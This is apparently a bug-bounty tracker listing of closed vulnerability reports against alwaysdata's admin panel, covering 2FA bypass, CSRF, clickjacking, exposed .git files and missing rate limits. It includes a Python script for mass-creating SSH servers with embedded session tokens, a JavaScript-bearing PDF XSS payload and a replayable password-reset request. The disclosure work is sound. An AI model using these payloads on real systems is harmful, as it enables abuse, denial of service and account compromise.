|
74 | Closed | Bypassing Two-Factor Authentication via Account Deactiv ... | waloodi_109 |
Task Description
Bypassing Two-Factor Authentication via Account Deactivation
Hello Team,
I hope you are doing well. I found a serious issue in https://admin.alwaysdata.com which Bypassing Two-Factor Authentication via Account Deactivation.
The vulnerability arises from a logical flaw in the account recovery and 2FA enforcement processes. Specifically, after deactivating an account, users can takeover and log in without being prompted for 2FA. The 2FA mechanism, which is designed to provide an additional layer of security, is effectively bypassed.
Steps To Reproduce
Go to https://admin.alwaysdata.com and make signup example@gmail.com
Then, go to admin detail section add some details first name, last name etc and activate 2fa.
After, activating 2fa submit and save the details.
After, saving the details click on Delete this profile button on right top side and submit the message what you want.
Your account is deleted without asking password confirmation and 2fa is also deactivated and attacker can easily takeover the account.
Note: This is possible only when user is forgot to login off the account at cafe or something else pc and recreate a account with this email address and reconfigure a 2fa to takeover the account.
Regard,
Waleed Anwar
|
|
73 | Closed | Unlimited SSH Server Creation Vulnerability on AlwaysDa ... | admsec |
Task Description
# Unlimited SSH Server Creation Vulnerability on AlwaysData
## Summary There is no limit on the number of SSH servers that can be created by a user on the AlwaysData platform. This vulnerability allows for unauthorized resource exhaustion, which could lead to service degradation or denial of service (DoS).
## Steps to Reproduce
1. Log in to your AlwaysData account. 2. Navigate to the SSH server creation page: `https://admin.alwaysdata.com/ssh/add/`. 3. Submit the form to create a new SSH server using a valid name and password. 4. Repeat the above step multiple times with different names like `jhoneone_1002`, `jhoneone_1003`, etc. 5. Observe that there is no limit imposed on the number of SSH servers that can be created, leading to potential resource exhaustion.
## Impact - Resource Exhaustion: An attacker can create an unlimited number of SSH servers, potentially exhausting the resources allocated to other users on the platform. - Denial of Service: Continuous server creation could degrade the platform's performance or lead to a denial of service.
## Recommendations - Implement Limits: Set a reasonable limit on the number of SSH servers that can be created per user. - Monitor for abnormal SSH server creation patterns and implement rate limiting to prevent abuse.
## Python Script to Exploit the Vulnerability
```python import requests
# Configuration url = "https://admin.alwaysdata.com/ssh/add/" headers = {
"Host": "admin.alwaysdata.com",
"Cookie": "csrftoken=dnNRG2ExW88JR4GFKyeRRbD0JMV6E7IH; django_language=en; sessionid=q25k858xtrmg95b2t486xg7snokn99ls",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "https://admin.alwaysdata.com/ssh/add/",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "https://admin.alwaysdata.com",
"Dnt": "1",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Te": "trailers"
}
# Function to create an SSH server def create_ssh_server(session, csrf_token, username, password="AAAaaa123###"):
data = {
"csrfmiddlewaretoken": csrf_token,
"name": username,
"password": password,
"home_directory": "",
"shell": "BASH",
"can_use_password": "on",
"annotation": "",
"submit": ""
}
response = session.post(url, headers=headers, data=data)
return response.status_code, response.text
# Main script if name == "main":
with requests.Session() as session:
# Replace the csrf_token below with your own token from your account
csrf_token = "hpjP7TYZxZLeNcxhqG3fC6vZkwecJIc4kCWwDLsmjXJNu63M047Wj7YPT8Z8dFKB"
for i in range(1002, 1100): # Create multiple servers
username = f"jhoneone_{i}"
status_code, response_text = create_ssh_server(session, csrf_token, username)
print(f"Status Code: {status_code}, Username: {username}")
# Optionally, you can log the response_text for debugging purposes
|
|
71 | Closed | Title: Unauthorized Email Sending Exploit** in [alwaysd ... | monty099 |
Task Description
*Title: Unauthorized Email Sending Exploit in [alwaysdata.com]
Summary:
A vulnerability has been discovered in the site's email handling system. The site assigns each user a unique email address. However, it is possible to send an email from any email account, bypassing the intended email restrictions and validation mechanisms.
Vulnerability Details:
- Type: Email Spoofing - Impact: Unauthorized email sending - Affected Component: Email Handling System
Description:
The application generates a unique email address for each user. However, it is possible to exploit the system to send emails from any arbitrary email address. This issue arises due to insufficient validation of the email sender’s address.
Proof of Concept:
1. Exploit Steps:
- Use an email client or script to send an email through the application. - Modify the "From" address to any arbitrary email address, not restricted to the user's assigned address.
2. Result:
- The email is sent successfully.
Follow the steps in the video: https://admin.alwaysdata.com/support/77431/376905-bandicam%202024-08-20%2003-19-32-375.mp4
Impact:**
This vulnerability allows an attacker to send emails appearing as if they are from any user.
|
|
70 | Closed | ClickJacking Leads to deletion of user profile | elit3pwner |
Task Description
Description: There is clickjacking vulnerability at https://admin.alwaysdata.com/admin/details/ endpoint. And, for deleting a profile, we just need two clicks.
Steps to reproduce: 1) Open your browser and search for https://admin.alwaysdata.com/admin/details/ 2) create an html file that overlays delete this profile icon and then the submit button.
Impact: Admin's account can be deleted in two clicks.
|
|
69 | Closed | EXIF metadata not stripped | elit3pwner |
Task Description
Summary: When uploading images in ticket option, the EXIF metadata is not removed or changed in any way. Description: When answering in the ticket, you can upload a file, and if you upload an image with EXIF metadata on it, it isn't stripped. This can lead to disclosure of location where photo was taken or other personal information by the photo uploader if their group is public, as anyone can download the logo and check the metadata. Steps To Reproduce: 1) Create a ticket. 2) Upload an image with exif metadata. 3) Now, download the same image and check the metadata.
Link to POC: https://drive.google.com/file/d/1KflN8xTcF6Gq-0x1wo-n65KkT9ScNHMl/view?usp=sharing
|
|
68 | Closed | *Title:*: Bypassing Email Address Restriction for Accou ... | monty099 |
Task Description
*Title:*: Bypassing Email Address Restriction for Account Creation
*Description:* The ban on an email can be bypassed
An example is the following e-mail address: "admin@alwaysdata.com"
*Steps to Reproduce:* 1. Attempt to create an account using a blocked email address. The system will display a message stating that the email address is blocked and prevent account creation. 2. Create an account using a different email address. 3. Once the account is successfully created, navigate to the account settings. 4. Change the email address of the account to the previously blocked email address. 5. Save the changes. The email address will be updated to the blocked one, bypassing the initial restriction.
*Impact:* This issue allows users to circumvent email address restrictions.
*Recommendation:* Implement server-side checks to ensure that email address restrictions are enforced consistently across all account management functionalities. Additionally, review the email update process to prevent such bypasses.
*POC:*
poc1: https://admin.alwaysdata.com/support/77431/375912-poc.22.png poc2: https://admin.alwaysdata.com/support/77431/375911-bandicam%202024-08-05%2009-36-57-769.mp4
|
|
67 | Closed | *Title:* Account Creation and Impersonation Vulnerabili ... | monty099 |
Task Description
*Title:* Account Creation and Impersonation Vulnerability in [admin.alwaysdata.com]
*Summary:* It is possible to create a new account on the site using the domain name admin1@alwaysdata.com. After creating this account, the username can be changed to that of a legitimate site administrator. This vulnerability allows the account to generate support tickets and invite users, In this way he can defraud users.
*Steps to Reproduce:* 1. Register a new account on the site using the email admin1@alwaysdata.com , Or by any other name 2. Change the account username to that of a real site administrator. 3. Use the account to create a support ticket and invite users.
poc: https://admin.alwaysdata.com/support/77431/375910-poc.alwaysdata.png
*Impact:* This vulnerability enables attackers to impersonate site administrators within the support system, Which enables the attacker to impersonate the administrators of the site and deceive users
*Recommendation:* To mitigate this risk, implement restrictions to prevent the creation of accounts with administrative email domains.
|
|
66 | Closed | *Title:* Insufficient Validation Allows Multiple Accoun ... | monty099 |
Task Description
*Title:* Insufficient Validation Allows Multiple Accounts Creation Under Single Subscription Plan
*Description:* A vulnerability has been identified in the subscription management system which allows users to create multiple accounts under the same subscription plan. This issue can be exploited to bypass restrictions on the number of accounts per plan and gain unauthorized benefits.
*Steps to Reproduce:*
1. *Create an Account:*
Sign up for a new account with a specific subscription plan (e.g., "Free Plan").
2. *Create a Duplicate Account:*
Attempt to create another account using the same subscription plan as the first account.
Notice that the system does not prevent the creation of multiple accounts under the same subscription plan.
3. *Create a Similar Plan Account:*
From the newly created account, sign up for a subscription plan similar to the first account's plan.
4. *Send an Invitation:*
Send an invitation from the second account to the first account to become an admin of the plan created by the second account.
5. *Accept the Invitation:*
After accepting the invitation, the first account will now have two accounts under the same subscription plan.
I sent a proof of concept: https://admin.alwaysdata.com/support/77431/375639-poc.mp4
*Impact:*
This vulnerability allows users to circumvent subscription limitations by creating multiple accounts under the same plan
|
|
64 | Closed | Insecure Account Deletion | sharmaraghs |
Task Description
Summary: The removal of account is one of the sensitive part of a web application that needs to protect, therefore removing an account should validate the authenticity of the user, however i have found that when removing an account, the system did not require the user to input the account password. Steps To Reproduce: 1.Create an account on https://alwaysdata.com 2.Go to My account section DELETE ACCOUNT. 3.Click on delete and you will see it will delete the account without any kind of verification or password confirmation.
Impact Exploit Scenario: The user logins to a shared computer (office, library, cafe) Left the account open. Intruder came and try to delete the users account Intruder can easily delete the account because the system did not protect it by asking the password to validate that the person deleting the account is the real user.
Regards Raghav Sharma
POC Link -: https://drive.google.com/file/d/1iu1gb0l44_sTqG2Ol-ZTbLc0ZKHYkO-f/view?usp=drive_link
|
|
63 | Closed | Stored XSS Via Upload Document | milapshah1 |
Task Description
Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
Severity-High
Steps to reproduce- 1) go to support https://admin.alwaysdata.com/support/
2) Open new ticket
3) upload this code as a.pdf (%PDF-1.3
%���� 1 0 obj «/Pages 2 0 R /Type /Catalog» endobj 2 0 obj «/Count 1 /Kids [3 0 R] /Type /Pages» endobj 3 0 obj «/AA
<</O
<</JS
(
try {
app.alert\("xss"\)
} catch \(e\) {
app.alert\(e.message\);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj 4 0 obj «/Length 21» stream BT /F1 24 Tf ET
endstream endobj xref 0 5 0000000000 65535 f 0000000015 00000 n 0000000062 00000 n 0000000117 00000 n 0000000424 00000 n trailer
«/Root 1 0 R /Size 5» startxref 493 %%EOF)
4) upload this file 5)Open this ticket 6) click on ulpaded malicious pdf file it will refelct
|
|
62 | Closed | Stored XSS Via Upload Document | milapshah1 |
Task Description
Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
|
|
58 | Closed | Missing Invitation Link for Existing Users | mudhaxk |
Task Description
Summary:
A vulnerability was discovered where a user with an existing account is not sent an invitation link when added to an organization, potentially leading to confusion and unauthorized access.
Impact:
- User unable to access organization resources - Potential unauthorized access to sensitive information - Increased risk of account takeover
Expected Result:
- User with an existing account should receive an invitation link to join the organization - User should be prompted to accept the invitation and join the organization
Actual Result:
- No invitation link is sent to the user - User is not prompted to accept the invitation and join the organization
Severity according to CVSS 3:
- Attack Vector (AV): Network (N) - Attack Complexity (AC): Low (L) - Privileges Required (PR): None (N) - User Interaction (UI): None (N) - Sensitivity (S): Medium (M) - Confidentiality (C): Medium (M) - Integrity (I): Medium (M) - Availability (A): Medium (M)
CVSS 3 Score: 6.5 (Medium)
Steps to Reproduce:
1. Add a user with an existing account to an organization 2. Observe no invitation link being sent to the user 3. Verify the user's inability to access organization resources
Recommended Fix:
1. Implement automatic invitation link sending for existing users 2. Ensure users receive a prompt to accept the invitation and join the organization 3. Validate user accounts and organization membership to prevent unauthorized access
Conclusion:
This vulnerability poses a medium risk to user access and organization security. Implementing automatic invitation link sending for existing users will ensure proper access and prevent unauthorized access attempts.
|
|
57 | Closed | Lack of Password Confirmation on Delete Account and GET ... | mudhaxk |
Task Description
Summary:
A vulnerability was discovered where the delete account functionality lacks password confirmation and is vulnerable to GET-based CSRF, potentially allowing attackers to delete accounts without authorization.
Impact:
- Unauthorized account deletion - Potential data loss - Increased risk of account takeover
Expected Result:
- Password confirmation should be required to delete an account - CSRF protection should prevent unauthorized requests
Actual Result:
- No password confirmation is required to delete an account - GET-based CSRF vulnerability allows unauthorized account deletion
Steps to Reproduce:
1. Login to the application 2. Trick the user into clicking a malicious link to delete their account: https://admin.alwaysdata.com/admin/details/1/delete 3. User click submit 4. Observe the account being deleted without password confirmation
Recommended Fix:
1. Implement password confirmation requirement for delete account functionality 2. Implement CSRF protection for delete account functionality 3. Validate requests to prevent unauthorized account deletion
Conclusion:
This vulnerability poses a critical risk to user accounts and data. Implementing password confirmation and CSRF protection for delete account functionality will prevent unauthorized account deletion and ensure the security and integrity of user accounts.
|
|
56 | Closed | Unauthorized Organization Creation | mudhaxk |
Task Description
Summary: A vulnerability was discovered where a user who is not given permission on invite is still able to create a new organization, potentially leading to unauthorized access and data breaches.
Impact:
- Unauthorized access to sensitive information - Potential data breaches - Increased risk of account takeover
Expected Result:
- User without permission should not be able to create a new organization - User should only be added to the organization with proper permission
Actual Result:
- User without permission is given a new organization on accepting invite - User is added to the new organization with unnecessary permissions
Steps to Reproduce:
1. Invite a user without permission 2. Observe the user creating a new organization 3. Verify the user's unnecessary permissions in the new organization
Recommended Fix: 1. Implement permission checks to prevent unauthorized organization creation 2. Ensure users are only added to organizations with proper permission 3. Validate user permissions on each request to prevent abuse
Conclusion:
This vulnerability poses a critical risk to sensitive information and user accounts. Implementing proper permission checks and validation will prevent unauthorized access and ensure the security and integrity of user accounts.
|
|
55 | Closed | Session Not Invalidated on Permission Change | mudhaxk |
Task Description
Summary:
A vulnerability was discovered where the session is not invalidated when permissions are changed, potentially allowing attackers to access sensitive information without proper authorization.
Impact:
- Unauthorized access to sensitive information - Potential data breaches - Increased risk of account takeover
Expected Result:
- Session should be invalidated when permissions are changed - User should be prompted to re-authenticate with new permissions
Actual Result:
- Session remains active after permission change - User retains access to sensitive information without re-authentication
Steps to Reproduce:
1. {Browser A → Admin}Login to the application 2. {Browser A → Admin}Change permissions for the user 3. {Browser B → User}Login to the application 4. Observe the session remaining active 5. Attempt to access sensitive information
Recommended Fix:
1. Invalidate the session when permissions are changed 2. Require users to re-authenticate with new permissions 3. Implement additional security measures, such as token-based authentication and secure cookie management
Conclusion:
This vulnerability poses a critical risk to sensitive information and user accounts. Invalidating the session when permissions are changed will prevent unauthorized access and ensure the security and integrity of user accounts.
|
|
54 | Closed | Lack of Verification Email | sanjoy804 |
Task Description
### Summary The website does not verify email addresses during the account creation process, which can lead to various security issues such as spam, abuse, and account recovery problems.
### Steps to Reproduce 1. Go to the account creation page.https://www.alwaysdata.com/en/register/ 2. Enter any email address and complete the registration process. 3. Notice that no email verification step is required.
### Impact - Spam and Abuse: Unverified accounts can be used to flood the system with spam or perform malicious activities. - User Impersonation: An attacker can use someone else's email address, leading to possible impersonation issues. - Account Recovery Problems: Users might face difficulties in recovering their accounts if email addresses are not verified.
### Recommendation Implement email verification as a mandatory step in the account creation process to ensure that the email addresses are valid and belong to the users registering them.
|
|
53 | Closed | Lack of Email Confirmation During Account Creation | lostsam |
Task Description
Severity: High
Vulnerability Description: The website allows users to create accounts without verifying their email addresses. This practice poses significant security and usability risks.
Impact:
Spam and Fake Accounts:
Malicious users can create multiple fake accounts, leading to spam and abuse of the platform. Automated scripts (bots) can exploit this vulnerability to flood the system with fake accounts, overwhelming resources and degrading performance. Account Security:
Unauthorized users can create accounts using someone else's email address, potentially leading to privacy breaches and unauthorized access to personal information. Genuine users might be unable to access their accounts if their email addresses are misused by others.
Communication Failures:
Users may not receive important notifications, updates, or password reset instructions, leading to poor user experience and support issues.
Reputation and Trust:
The lack of basic security measures can lead to loss of trust among users and damage the website's reputation. Users might perceive the platform as insecure and unreliable, leading to reduced user retention and engagement. Steps to Reproduce: Navigate to the account creation page. Enter any email address (including ones that do not belong to the user) and complete the registration process. Observe that the account is created and accessible without any email verification step.
Recommended Mitigation:
Implement Email Verification:
During registration, send a confirmation email to the provided email address containing a unique verification link. Require users to click on the verification link to activate their accounts. Use CAPTCHA:
Incorporate CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) during the registration process to prevent automated bots from creating accounts.
Rate Limiting:
Implement rate limiting on the account creation endpoint to prevent mass account creation from the same IP address within a short period.
Audit Existing Accounts:
Review existing accounts for potential fake or unauthorized accounts and take appropriate actions, such as sending verification requests or disabling suspect accounts.
References: OWASP Authentication Cheat Sheet: OWASP Authentication Cheat Sheet NIST Digital Identity Guidelines: NIST SP 800-63B
|
|
52 | Closed | Direct IP Access of the Domain on HTTP | lostsam |
Task Description
Hello Team, My Name Is Pawan Yadav, a cyber security researcher from India. While testing one of your domains, I have found a vulnerability in your site.
Here is the detailed report:
Vulnerability Description :- Direct IP access refers to the ability to access a website or service directly via its IP address rather than its domain name (e.g., http://185.31.40.186/ instead of https://admin.alwaysdata.com/login/?next=/ ). Direct IP access can bypass certain security controls implemented at the domain level, potentially exposing sensitive information or allowing unauthorized access to resources.
Attack Vector :- An attacker can directly access the web application by using its IP address, bypassing domain- based security controls such as Web Application Firewalls (WAFs), IP filtering, or access controls based on the domain name. Domain :- https://admin.alwaysdata.com/login/?next=/ Direct IP Access :- http://185.31.40.186/ Reference :- https://www.nexgi.com/digital-library/direct-ip-access/
Impact:-
Denial of Service : Direct IP-address Access has its own set of issues. For starters, it increases the chances to encounter a Distributed Denial of Service attack. Data Interception: Attackers can intercept and read sensitive information transmitted between the server and clients, such as login credentials, personal information, and payment details. Man-in-the-Middle Attacks: This vulnerability enables attackers to intercept and potentially alter the communication between the server and client, leading to unauthorized data modification or injection of malicious content. Loss of User Trust: A lack of HTTPS can undermine the trust and credibility of the website among its users, potentially leading to decreased user engagement and conversions.
POC
https://drive.google.com/file/d/19idNkDidehPI_SR3qQfvArwgCSji7elc/view?usp=sharing
|
|
51 | Closed | Multiple Free Public Cloud accounts obtained by a singl ... | d_sharad |
Task Description
Description
Alwaysdata allows users to create a Free Public Cloud (100MB) account. Each user is limited to having only one Free Public Cloud (100MB account. However, I discovered that a user can bypass this restriction and obtain multiple Free Public Cloud (100MB) accounts by asking other users to create a new free account and then transfer ownership of that account to them.
Reproduction Steps
1. User A creates a new Free Public Cloud (100MB) storage account 2. User B creates a new Free Public Cloud (100MB)storage account 3. User B transfers ownership of their account to User A through: https://admin.alwaysdata.com/admin/account/ 4. User A now has two Free Public Cloud (100MB)storage accounts (their original account and the one transferred from User B) 5. This process can be repeated with same user B for unlimited times to accumulate unlimited no of free accounts.
Impact
By exploiting account ownership transfers, a user can essentially obtain unlimited free storage, potentially leading to loss for alwaysdata
Recommendation
Implement additional checks and restrictions to prevent users from obtaining multiple free accounts through ownership transfers. Possible mitigations could include:
1. Limiting the number of free accounts a user can own, regardless of the acquisition method (creation or transfer). 2. Disallowing ownership transfers for free accounts or requiring explicit approval from the service provider. 3. Automatically consolidating multiple free accounts under the same user into a single account, preserving the total storage limit.
Proof of Concept:
|
|
49 | Closed | Vulnerability Report: Lack of Rate Limiting on Password ... | anshumanbaghel |
Task Description
The website does not implement rate limiting on password reset links, allowing an attacker to repeatedly request password reset links for any account. This could lead to account takeover through brute-force attacks.
Description When an attacker gains access to a target account's email address, they can repeatedly request password reset links without any rate limiting in place. This allows them to flood the target's email inbox with reset links, making it difficult for the legitimate user to identify and use the valid reset link. Additionally, the attacker can automate this process, increasing the efficiency of the attack.
Impact Account Takeover: Attackers can potentially take over user accounts by flooding their email inbox with reset links, making it easier to intercept a valid reset link and gain unauthorized access. User Disruption: The flood of reset links can disrupt the user's ability to use their email normally, causing inconvenience and potential confusion.
Recommendations Implement rate limiting on password reset requests to prevent brute-force attacks. Limit the number of password reset links that can be requested per minute per IP address or account. Implement CAPTCHA or other mechanisms to distinguish between automated and legitimate requests.
Steps to Reproduce 1- Go To This Link https://admin.alwaysdata.com/login/ Enter your Email Click On Forget Password 2- intercept burp and send request to intruder 3- make payload and start attack
Supporting Material/References
OWASP Password Reset Best Practices
Impact Account Takeover User Disruption
Proof of Concept N/A (Describe how you were able to successfully exploit the vulnerability.)
Remediation Implement rate limiting on password reset requests to prevent brute-force attacks. Limit the number of password reset links that can be requested per minute per IP address or account. Implement CAPTCHA or other mechanisms to distinguish between automated and legitimate requests.
Supporting Material/References OWASP Password Reset Best Practices
Impact Account Takeover User Disruption
Proof of Concept
SS ATTACHED
REQUEST** (BY USING BRUP SUITE)
POST /password/lost/ HTTP/2 Host: admin.alwaysdata.com Cookie: REACTED User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://admin.alwaysdata.com/password/lost/ Content-Type: application/x-www-form-urlencoded Content-Length: 116 Origin: https://admin.alwaysdata.com Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers
csrfmiddlewaretoken=8GNhIyHjyRaBHSlBRaaN9gMWKaksiJR3Py8S3TJoW8zb7tq5gU4JzRA1cMEp0VHl&email=alexdoppler29%40gmail.com
SS LINK - https://drive.google.com/file/d/1a0vqAOB6u6ayQSNX4ktQuUOWIAgNQjAR/view?usp=sharing
|
|
47 | Closed | information disclosure | Bhavish |
Task Description
i found this detial in one of the git file on https://security.alwaysdata.com/.git/config
and this file contains 0000000000000000000000000000000000000000 58bea729f4359a45f69aaba274bb2a931155b427 Cyril Baÿ cbay@alwaysdata.com 1704809861 +0100 clone: from https://github.com/flyspray/flyspray.git
this information in the master named file which i think is sensitive as it disclosing the email address and other stuff also other files like config and packed-refs contain sensitive information , but its all on you to decide weather the information is sensitive or not contact me on my email bhavishthakral123@gmail.com
|
|
46 | Closed | Open Redirection Vulnerability | rockert |
Task Description
Hi Team,
I hope this email finds you well. I am Ali Haider, a security researcher and a penetration tester. I have been a bug bounty hunter for almost 2 years now. I always enjoyed the challenge of finding vulnerabilities, as it always felt like a great achievement to find them. I wanted to bring to your attention a Open Redirection Vulnerability I encountered while using your website.
|
|
45 | Closed | Bug Title: Missing access control at password change. | bugtest09 |
Task Description
Hello Web Security Severity: Medium Domain: https://admin.alwaysdata.com
Description : A security researcher discovered that after resetting a password, the user was automatically logged in. As such, compromising a legitimate password reset link (via referrer token leakage or a similar issue) could lead to compromising the account since the user would not be forced to log in after resetting their password.
Proof Of Concept: 1.Go to this website:(https://admin.alwaysdata.com) 2.Send the password reset link to your email. 3.Go to your email and open the link. 4.Set a new password. 5.Boom.Automatically logged in.
Fix: OWASP forgot password recommendations(https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet) suggest a better approach, which we have now implemented.
Thanks.
Reference : https://hackerone.com/reports/164648 https://hackerone.com/reports/255020
|
|
43 | Closed | Information Disclosure PHPpgAdmin | 0xmagdy |
Task Description
Vulnerability Detail
PHPpgAdmin setup page is accessible over the internet in which it's possible for the user setup the servers with required details.
Vulnerable Endpoints
https://phppgadmin.alwaysdata.com/phppgadmin/redirect.php?subject=root You can add a server via this endpoint https://phppgadmin.alwaysdata.com/phppgadmin/redirect.php?subject=server&server=&
Impact Its possible for an attacker to configure the servers without information of the application adminstrator.
|
|
35 | Closed | Git Folder Forbidden Bypass | roxy |
Task Description
Hi, During google search I have found an Open sensitive git directory. Git metadata directory (.git) was found in this folder. An attacker can extract sensitive information by requesting the hidden metadata directory that version control tool Git creates. The metadata directories are used for development purposes to keep track of development changes to a set of source code before it is committed back to a central repository (and vice-versa). When code is rolled to a live server from a repository, it is supposed to be done as an export rather than as a local working copy, and hence this problem. Vulnerable URL:- https://upload.alwaysdata.com/.git/ (403 forbidden) bypass https://upload.alwaysdata.com/.git/config https://upload.alwaysdata.com/.git/logs/HEAD
https://security.alwaysdata.com/.git/ (403 forbidden) bypass https://security.alwaysdata.com/.git/config https://security.alwaysdata.com/.git/logs/HEAD
These files may expose sensitive information that may help a malicious user to prepare more advanced attacks. Remove these files from production systems or restrict access to the .git directory. To deny access to all the .git folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess) Thanks
|
|
32 | Closed | Server Path Traversal + Information Disclosure on admin ... | freetb | |
|
31 | Closed | Broken Access Vulnerability via 'Impossible deletion' E ... | freetb | |
|
30 | Closed | Information Disclosure on cAdvisor software via Origin ... | freetb | |
|
29 | Closed | URL Override in api.alwaysdata.com | freetb | |
|
28 | Closed | Summary: A username disclosure vulnerability has been i ... | nilesh | |
|
26 | Closed | #1 Crititical Vulnerability Name: No Rate Limit in addi ... | Fahimhusain Raydurg | |
|
25 | Closed | Title: Security Report: Public Exposure of Sensitive In ... | monty099 | |
|
24 | Closed | Security Report:Broken Access Control (BAC) in [admin.a ... | monty099 | |
|
23 | Closed | Subject: Vulnerability Report: Transmission of Credenti ... | neelshukla0409 | |
|
22 | Closed | Vulnerability Report: Unverified Email Registration on ... | neelshukla0409 | |
|
21 | Closed | Bug Bounty Report | Aditya2003 | |
|
20 | Closed | Unauthorized Access to Over 6000+ Valid User Credential ... | Bad_Script3r | |
|
19 | Closed | User Enumeration Through Forgot Password Vulnerability | basil | |
|
2 | Closed | XSS Vulnerability in [admin.alwaysdata.com] Support Tic ... | Redhet | |